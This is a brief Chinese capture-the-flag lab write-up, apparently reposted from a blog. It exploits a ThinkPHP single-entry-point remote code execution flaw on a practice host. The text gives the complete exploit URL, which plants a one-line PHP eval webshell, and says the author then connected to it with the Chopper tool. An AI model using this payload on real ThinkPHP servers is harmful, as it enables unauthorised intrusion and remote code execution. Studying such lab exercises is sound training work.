实验环境:winxp
工具:菜刀
目的:获取www.test.ichunqiu的flag
根据提示下载web.exe,下载后解压看到thinkphp框架
这个实验室利用thinkphp的单一入口漏洞
url请求需要经过index.php来进行分发,然后由内部过滤器来获取到传递的参数,如果没有进行过滤就能远程命令执行
直接插入一句话木马http://www.test.ichunqiu/index.php/module/action/param1/{${eval($_POST[1])}}
返回了一个错误页面,直接用菜刀连接拿到flag
原文地址:https://www.cnblogs.com/noob199/p/15101164.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。